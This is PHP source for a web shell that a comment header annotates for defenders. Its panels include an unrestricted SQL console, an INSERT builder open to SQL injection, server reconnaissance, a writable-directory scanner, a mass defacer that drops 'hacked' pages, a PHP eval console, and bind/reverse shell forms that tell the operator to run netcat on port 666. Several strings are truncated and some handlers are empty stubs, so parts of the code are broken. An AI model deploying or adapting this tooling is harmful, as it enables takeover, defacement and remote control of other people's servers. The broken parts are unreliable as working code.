$db=$_GET['db'];
$tbl=$_GET['table'];
$r='';
if(!isset($_POST['kirim']))
{
$r.="<div id='isi'>
<a href='?act=showtable&db=$db'>Show Tables </a>
<br />";
$r.="
";
$r.="<table width=100% align='center' cellspacing=0 class='xpltab'>";

$cols=array();
$iml=mysql_query("SHOW COLUMNS FROM $db.$tbl");
// Collect column names and print one label cell per column.
while($colom=mysql_fetch_assoc($iml))$cols[]=$colom['Field'];
for($i=0;$i<count($cols);$i++)
{
$pt=$cols[$i];
$r.="<td style='border:none'>".$pt."<td style='border:none'>".' : ';
}
$r.="<input type='hidden' name='action' value='insertrow'><input id='but' type='submit' name='kirim' value='Insert'>
</div>";
return $r;
} else {
// Drops the last two posted fields before using the rest as column values
// (presumably the hidden action field and the submit button — verify against the form).
array_pop($_POST);
array_pop($_POST);
$val=array();
$c="INSERT INTO $_GET[db].$_GET[table] VALUES (";
foreach ($_POST as $value) {
$val[]=$value;
}
// Join the values as quoted literals, comma-separated, with no escaping.
for($i=0;$i<count($val);$i++)
{
($i==count($val)-1?$c.="'$val[$i]'":$c.="'$val[$i]',");
}
$c.=");";
$qu=$this->qe($c);
(!$qu?$r.="Failed brow, error on: ".mysql_error():$r.="Success");
}
return $r;
}
// Returns the markup for the "Quick Query" box: a text input named sqlcmd
// (pre-filled with 'show databases') and a submit button named submit.
// sqlcmd() appends this to its own output and reads both fields back.
function sqlcommand()
{
$r="
Quick Query <input type='text' value='show databases' name='sqlcmd' style='width:500px;margin-top:14px;' id='box'><input type='submit' name='submit' value='Go' id='but'>
";
return $r;
}

//display sql query
// Runs an arbitrary SQL statement taken from $_POST['sqlcmd'] and renders the
// result set as a table, followed by the quick-query box from sqlcommand().
// Returns the HTML string.
// Defender note: this is an unrestricted SQL console dispatched from ?act=sqlcmd.
// The statement text travels in the POST body, so it appears only where
// request bodies are logged.
function sqlcmd()
{
$this->connector();
$r='<div id="isi">';
if(isset($_POST['submit']))
{
$re=$_POST['sqlcmd'];
if(!empty($re))
{
// The posted text is passed to the query wrapper unchanged.
$qe=$this->qe($re);
if($qe)
{
$r.="<table align=center cellpadding=5 style='width:100%;font-size:12px;'>";
// Header row: one cell per result field, HTML-escaped.
for($i=0;$i<mysql_num_fields($qe);$i++)
{
$r.="<th style='border:thin dashed #f00;background:#f00;'>".htmlspecialchars(mysql_field_name($qe,$i))."</th>";
}
$r.="</th>";
// Data rows: each value is HTML-escaped before output.
while ($dat=mysql_fetch_row($qe)) {
$r.="";
for($n=0;$n<mysql_num_fields($qe);$n++)
{
$r.="<td style='border-bottom:thin dashed #f00;'>".htmlspecialchars($dat[$n])."";
}
$r.="";
}
$r.="";
// On failure the submitted query text is echoed back without escaping.
} else $r.="
".$re."<br />Error brow, check your query";
}else $r.="
Fill the query brow
";

}
$r.=$this->sqlcommand();
$r.="</div>";
return $r;
}

//converter form
// Renders the encoder/decoder page and, on submit, the conversion result.
// $opt maps the labels shown in the <select> to the type codes posted as 'isi'.
// The conversion is delegated to $this->convert(), which is not visible in this
// part of the file. Returns the HTML string.
// Defender note: dispatched from ?act=encode.
function converter()
{
$r='';
$r.="<div id='isi'>";
$opt=array("MD5"=>"md5","Hex"=>"hexa","Base64 Encoder"=>"64en","Base64 Decoder"=>"64de","SHA1"=>"sha1","URL Encoder"=>"urlen","URL Decoder"=>"urlde");
if(isset($_POST['submit'])&&!empty($_POST['convert']))
{
// Only the selected type code is passed. The result goes into the textarea unescaped.
$val=$this->convert($_POST['isi']);
$r.="<textarea >$val</textarea>";
}
$isi="
<textarea style='width:50%;height:100px;border:1px solid #f00;' name='convert' ></textarea><br /><select name='isi' id='box'>";
foreach ($opt as $k=>$v) {
$isi.="<option value=$v>".$k."</option>";
}
$r.=$isi."<input type='submit' name='submit' style='color:#fff' id='but' value='Convert'>
</div>";
return $r;
}
//display valuable info on server
// Builds a server-information panel: disabled functions, safe mode, PHP version,
// loaded extensions, URL-include setting and disk space for the current directory.
// Returns the HTML string.
// Defender note: host reconnaissance dispatched from ?act=ser. The same settings
// (disable_functions, allow_url_include) are the ones worth hardening and auditing.
function infoser()
{
$r="<div id='isi'><table style='font-size:12px;'>";
$r.="Disable Function : ".(ini_get('disable_functions')?ini_get('disable_functions'):"All Function Enable")."";;
$r.="Safe Mode : ".(ini_get('safe_mode')?"On":"Off")."";
// NOTE(review): some option names passed to ini_get() below do not look like
// PHP's actual directive names, so those rows may not reflect the real configuration.
$r.="Open Base Dir : ".ini_get('openbase_dir')."";
$r.="Php version : ".phpversion()."";
$r.="Register Global : ".(ini_get('register_global')?'Enable':'Disable')."";
$r.="Curl : ".(extension_loaded('curl')?'Enable':'Disable')."";
$r.="Database Mysql : ".(function_exists('mysql_connect')?'On':'Off')."";
$r.="Magic Quotes : ".(ini_get('Magic_Quotes')?'On':'Off')."";
$r.="Remote Include : ".(ini_get('allow_url_include')?'Enable':'Disable')."";
// Sizes are formatted by $this->getSize(), defined elsewhere in the class.
$r.="Disk Free Space : ".$this->getSize(diskfreespace($this->dir()))."";
$r.="Total Disk Space : ".$this->getSize(disk_total_space($this->dir()))."";
$r.="</div>";
return $r;
}
//display available drive on winbox
// Probes drive letters A: through Z: with is_dir() and returns one
// ?act=file&dir=<drive> link per letter that exists.
// $r is not initialised, so the return value is null when no drive matches.
function drive()
{
foreach (range("A", "Z") as $val) {
if(is_dir($val.":".DIRECTORY_SEPARATOR))
{

$ad=$val.":".DIRECTORY_SEPARATOR;
$r=$r.="<a href='?act=file&dir=$ad'>$val:".DIRECTORY_SEPARATOR."</a> ";
}
}
return $r;
}
//find writable directory
// Lists the entries of $dir that pass is_dir() and is_writable(), and returns them
// as file-manager links (or "Not Found"). Called by writable() and by mass().
// $dir is caller-supplied (both callers pass a posted value) and is concatenated
// into the href unescaped.
// Defender note: enumeration of writable directories usually precedes file drops,
// so keeping the web server account's writable paths to a minimum limits what this finds.
function scdir($dir)
{
$r='';
$dname=array();
if($dh=opendir($dir))
{
while (false !==($name=readdir($dh))) {

if($name !='.'&&$name!='..')
{
// The tests are applied to the bare entry name as returned by readdir().
if(is_dir($name)&&is_writable($name))
{

$dname[]=$name;
}
}
}
closedir($dh);
}
if($dname)
{
foreach ($dname as $val) {
$r.="<a href='?act=file&dir=".$dir.$val.DIRECTORY_SEPARATOR."'>".$dir.$val."</a><hr style='border:thin solid #2e2e2e' />";
}
} else $r.="Not Found";


return $r;
}
//writable scanner form
// Page for the writable-directory scanner. When finddir and submit are posted it
// appends the scdir() result for the posted path, then always appends the search form.
// Returns the HTML string.
// Defender note: dispatched from ?act=write.
// NOTE(review): the string literal below looks truncated in this listing (markup
// apparently stripped during extraction), so the statement is not valid PHP as shown.
function writable()
{
$r="<div id='isi'>";
if(isset($_POST['finddir'])&&isset($_POST['submit']))
{
// The posted path is handed to scdir() without validation.
$r.=$this->scdir($_POST['finddir']);

} //else {
$r.="
Find All Writable Directory <br />
dir()."'>".$this->current('write')."<br /><input type='hidden' name='finddir' id='box' value='".$this->dir()."'><input id='but' type='submit' style='margin-top:5px;color:#fff' name='submit' value='Search'>
";
//}
$r.="</div>";
return $r;
}

//mass defacer
// Page for the mass-defacement feature. When def, fname and isinya are posted it
// calls deface() with the posted directory, file name and content, then appends the
// scdir() listing for that directory. Otherwise it renders the form.
// Returns the HTML string.
// Defender note: dispatched from ?act=md. The form's default file name is 'hack.htm',
// and the same file appearing in many sibling directories is the on-disk indicator.
// NOTE(review): the form string below looks truncated in this listing (markup
// apparently stripped during extraction), so the statement is not valid PHP as shown.
function mass()
{
$r="<div id='isi'>";
if(isset($_POST['def'])&&isset($_POST['fname'])&&isset($_POST['isinya']))
{
// addr is used here but is not part of the isset() check above.
$r.=$this->deface($_POST['addr'],$_POST['fname'],$_POST['isinya']);
$r.=$this->scdir($_POST['addr']);
}
else {
$r.="
dir()."'>Mass Defacer <br /><input type='hidden' style='width:500px;' name='addr' id='box' value='".$this->dir()."'>".$this->current('md')."<br />File Name <input type='text' name='fname' value='hack.htm' style='margin:7px 0;' id='box'><br />
<textarea name='isinya' style='border:1px solid #f00;'>

hacked

</textarea><br /><input type='submit' name='def' id='but' value='Deface'>
";
$r.="</div>";
}

return $r;
}
//mass defacer funct
// Worker for mass(): collects directory entries of $al that pass is_dir() and
// is_writable(), then writes $source to a file named $fname inside each of them.
// $al is first passed through $this->replace(), which is defined elsewhere in the class.
// Returns a status string ("Mass Deface Success" or "failed").
// Defender note: the footprint is the same file name and content created across
// sibling directories within a short time window; file-integrity monitoring and
// a non-writable document root for the web server account address it.
function deface($al,$fname,$source)
{
$dname=array();
$al=$this->replace($al);
if($dh=opendir($this->replace($al)))
{
while (false !==($name=readdir($dh))) {

if($name !='.'&&$name!='..'&&is_dir($name))
{
if(is_writable($name))
{
$dname[]=$name;

}
}
}
closedir($dh);
}
if($dname)
{
// $r is first used here without being initialised.
$r.="Mass Deface Success <br />";
foreach ($dname as $val) {
// Opens the target with mode "w", so an existing file of that name is truncated.
if($fp=fopen($al.$val."/".$fname,"w"))
fwrite($fp, $source);
fclose($fp);
}


}
else $r.="failed";
return $r;
}
//backdoor function
// Recursive scanner behind doorscan(): walks $dir and reports every file whose
// content matches "<name>(...)" for any function name posted in $_POST['bug'].
// Each hit is reported with its path and last-modified time. Returns the report string.
// The posted names are placed into the regular expression without preg_quote(), and
// errors from scandir/is_dir/file_get_contents/preg_match are silenced with '@'.
// Directories named 'cgi-bin' are skipped.
function bdf($dir)
{

$r='';
$has=$_POST['bug'];
if($files = @scandir($dir)) {
foreach($files as $file) {
if($file != '.' && $file != '..'&& $file !='cgi-bin') {
// $slash is not defined anywhere in this function.
if(@is_dir($dir.$slash.$file)) {
// Descend into the subdirectory and append its findings.
$r.=$this->bdf($dir.$file.DIRECTORY_SEPARATOR);

} else {
// The whole file is read into memory; empty or unreadable files are skipped.
$op = @file_get_contents($dir.DIRECTORY_SEPARATOR.$file);
if($op)
foreach($has as $bug) {
if(@preg_match("/$bug\((.*?)\)/", $op)) {

$r.="Contain '$bug' at ".$dir.$file."".date("d-M-Y H:i",filemtime($dir.$file))."";

}
}

}
}
}
}
return $r;
}
//backdoor scanner form
// Page for the "backdoor scanner". Sets $this->find to the list of function names
// offered as checkboxes. When submit and bug[] are posted it appends the bdf() report
// for the posted directory. Otherwise it renders the selection form.
// Returns the HTML string.
// Defender note: dispatched from ?act=bds. The list mixes code-execution functions
// with file-handling and escaping helpers, so a match alone is a weak signal.
// NOTE(review): the form string below looks truncated in this listing (markup
// apparently stripped during extraction), so the statement is not valid PHP as shown.
function doorscan()
{
$this->find = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file','copy','pcntl_exec','escapeshellarg','escapeshellcmd','proc_open','proc_get_status','proc_nice','proc_open','proc_terminate');
$r="<div id='isi'>";
if(isset($_POST['submit'])&&isset($_POST['bug']))
{ $r.="<table width='100%'' class='xpltab'><th>These Files Probably Backdoor</th><th>Last Modified</th>";
// The directory to scan is taken from the POST body, not from the server-side state.
$r.=$this->bdf($_POST['dir']);
$r.="";
}
else {

$r.="
dir()."'>Scan In : <input type='hidden' name='dir' value='".$this->dir()."'>".$this->current('bds')."<br />Scan Type :
";
// One checkbox per entry in $this->find, posted back as bug[].
foreach ($this->find as $val) {
$r.="<input style='margin-left:43%;margin-top:7px;' type='checkbox' name='bug[]' value='".$val."'>".$val."<br />";
}
$r.="
<input type='submit' name='submit' id='but' style='margin-top:10px;width:150px;color:#fff' value='Search Backdoor'>";
$r.="
";
}
$r.="</div>";


return $r;
}

// Unfinished variant of mass(): the branch taken when dir, file and source are posted
// is empty, and the other branch only appends a form to an uninitialised $r.
// The three parameters are never used and nothing is returned.
// Defender note: called for POST action=mass. The form's default file name is 'index.php'.
// NOTE(review): the form string below looks truncated in this listing (markup
// apparently stripped during extraction), so the statement is not valid PHP as shown.
function newmass($dir,$file,$source)
{
if(isset($_POST['dir'])&&isset($_POST['file'])&&isset($_POST['source']))
{

}
else {
$r.="
dir()."'>Mass Defacer <br /><input type='hidden' style='width:500px;' name='addr' id='box' value='".$this->dir()."'>".$this->current('md')."<br />File Name <input type='text' name='fname' value='index.php' style='margin:7px 0;' id='box'><br />
<textarea name='isinya' style='border:1px solid #f00;'>

hacked

</textarea><br /><input type='submit' name='def' id='but' value='Deface'>
";
$r.="</div>";
}
}
// Renders the bind-shell / reverse-shell panel: a table of forms for several
// interpreters. Each form has an address field pre-filled with the server's resolved
// IP and a port field defaulting to 666. Returns the HTML string.
// Only markup is produced here; no socket is opened and no process is started in this
// method, and bc() is an empty stub in this listing.
// Defender note: dispatched from ?act=bc. Fixed strings in the rendered page include
// the hidden action values 'bc' and 'bperl' and the default port 666. Egress filtering
// from the web tier and alerting on unexpected listeners cover what these forms intend.
function door()
{
// Resolves the Host header value to an IP. The header is client-controlled.
$this->ip=gethostbyname($_SERVER['HTTP_HOST']);
$r="";
$frm="
";
$hd="<input type='hidden' name='action' value='bc'>";
// Operator instructions shown under the bind ($ms) and reverse ($ms2) forms.
$ms="Press connect Button and run nc on your machine -> nc ".$this->ip." 666";
$ms2="run nc on your machine -> nc -lnvp 666 then press connect button";
//Bind Perl
$r.="<table border='0' width='100%' class='xpltab'><th>Bind Shell</th><th>Reverse Shell</th>
<td ><span class='gede'>Perl</span> <br />$frm<input type='hidden' value='".$this->ip."' name='ip' id='box'><br />Port : <input type='text' name='port' value='666' id='box' />$hd<input type='submit' name='Go' value='connect' id='but'><input type='hidden' name='action' value='bperl'>
<p>$ms";
//reverse perl
$r.="<td style='border-right:1px solid #f00'><span class='gede'>Perl </span><br />Your Ip <input type='text' value='".$this->ip."' name='bcperlip' id='box'><br />Port : <input type='text' name='port' value='666' id='box' style='margin-top:5px;margin-left:17px;'/><input type='submit' name='Go' value='connect' id='but'><p>$ms2";
//bind python
$r.="<span class='gede'>Python</span> <br /><input type='hidden' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' /><input type='submit' name='Go' value='connect' id='but'>
<p>$ms
";
//reverse python
$r.="<td style='border-right:1px solid #f00'><span class='gede'>Python</span> <br />Your Ip<input type='text' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' style='margin-top:5px;margin-left:13px;'/><input type='submit' name='Go' value='connect' id='but'><p>$ms2";
//Bind C
$r.="<span class='gede'>Bin</span> <br /><input type='hidden' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' /><input type='submit' name='Go' value='connect' id='but'>
<p>$ms";
//Reverse PHP
$r.="<td style='border-right:1px solid #f00'><span class='gede'>Php</span> <br />Your Ip<input type='text' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' style='margin-top:5px;margin-left:13px;'/><input type='submit' name='Go' value='connect' id='but'><p>$ms2";
//Bind Ruby
$r.="<span class='gede'>Ruby</span> <br /><input type='hidden' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' /><input type='submit' name='Go' value='connect' id='but'>
<p>$ms";
//Reverse Ruby
$r.="<td style='border-right:1px solid #f00'><span class='gede'>Ruby</span> <br />Your Ip <input type='text' value='".$this->ip."' name='bcperl' id='box'><br />Port : <input type='text' name='port' value='666' id='box' style='margin-top:5px;margin-left:17px;'/><input type='submit' name='Go' value='connect' id='but'><p>$ms2
";
return $r;
}
// Stub dispatcher for the connect forms rendered by door(): every branch is empty,
// so this listing performs no action for any $type. The label 'bindpl' appears
// twice, so the second case can never be selected. Returns nothing.
function bc($type)
{
switch ($type) {
case 'bindpl':
# code...
break;
case 'bindpl':

break;
default:
# code...
break;
}
}

}
// Request dispatcher for the shell. Output is accumulated in $r and echoed at the end.
// Two request parameters select the behaviour:
//   $_GET['act']     - which panel to render (file manager, SQL tools, eval, scanners, ...)
//   $_POST['action'] - which state-changing operation to run (file edits, uploads, SQL writes)
// Both are read without isset() checks. Defender note: the case labels below are stable
// strings to hunt for in access logs and WAF rules (act=... in the query string,
// action=... in POST bodies). Paths and file names are taken directly from
// $_GET['file'] / $_POST['file'] and handed to the class methods.
$bajax=new bajax();
$r='';
$r.=$bajax->header();
$r.=$bajax->menu();
echo "</div='isi'>";
switch ($_GET['act']) {
case 'file':

// isset() yields a boolean that is then loosely compared with 'del', so these
// branches run whenever act2 / act3 is present, whatever its value.
if(isset($_GET['act2'])=='del')
$r.=$bajax->remfile();
if(isset($_GET['act3'])=='del')
$r.=$bajax->remdir();
$r.=$bajax->xpl();
$r.=$bajax->center();
break;
case 'edit':
$r.=$bajax->edit($_GET['file']);
break;
case 'ren':
$r.=$bajax->ren($_GET['file']);
break;
case 'cmd':
$r.=$bajax->command();
$r.=$bajax->center();
break;
case 'down':
$r.=$bajax->downloadfile($_GET['file']);
break;
case 'downfolder':
$r.=$bajax->downloadfolder($_GET['file']);
break;
// --- MySQL client panels ---
case 'mysql':
$r.=$bajax->login();
break;
case 'view':
$r.=$bajax->lihatdb();
break;
case 'showtable':
$r.=$bajax->showtable();
break;
case 'showcon':
$r.=$bajax->showcon();
break;
case 'downdb':
$r.=$bajax->downdb();
break;
case 'editrow':
$r.=$bajax->editrow();
break;
// Clears the whole session, which also removes the shell's own login flag set at the top of the file.
case 'logout':
$_SESSION=array();
session_destroy();
header("location:?act=mysql");
break;
case 'dropdb':
$r.=$bajax->dropsql();
break;
case 'delrow':
$r.=$bajax->droprow();
break;
case 'insertrow':
$r.=$bajax->insertrow();
break;
case 'sqlcmd':
$r.=$bajax->sqlcmd();
break;
case 'encode':
$r.=$bajax->converter();
break;
case 'ser':$r.=$bajax->infoser();break;
// phpeval() is defined elsewhere in the class; by its name and panel this is the PHP code-execution console.
case "eval":
$r.=$bajax->phpeval();$r.=$bajax->center();
break;
case 'write':
$r.=$bajax->writable();
break;
case 'bds':$r.=$bajax->doorscan();break;
case 'md':$r.=$bajax->mass();break;
case 'bc':$r.=$bajax->door();break;
default:
$r.=$bajax->logo();
break;

}
// Second dispatch on the POST body. It runs in addition to the GET dispatch above on the same request.
switch ($_POST['action']) {
case 'editfile':
if($bajax->editfile($_POST['file']))
$r.=header("location:?act=file&dir=".$bajax->dir()."");

break;
case 'renamed':
if($bajax->rename($_POST['file']))
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;
case "mkdir":
$r.=$bajax->mkdir();
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;
case "createfile":
$r.=$bajax->createfile();
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;

// File upload into the current directory. upload() is defined elsewhere in the class.
case "uploader":
$r.=$bajax->upload();
$r.=header("location:?act=file&dir=".$bajax->dir()."");
break;
case 'createdb':
$r.=$bajax->createdb($_POST['dbname']);
break;
case 'updaterow':
$r.=$bajax->updaterow();
break;
case 'insertrow':
$r.=$bajax->insertrow();
break;
case 'mass':
$r.=$bajax->newmass($_POST['dir'],$_POST['file'],$_POST['source']);
break;
// bc() declares a required $type parameter but is called here with no argument.
case 'bc':
$r.=$bajax->bc();
break;

}
echo "</div>";
$r.=$bajax->footer();
echo $r;

ob_end_flush();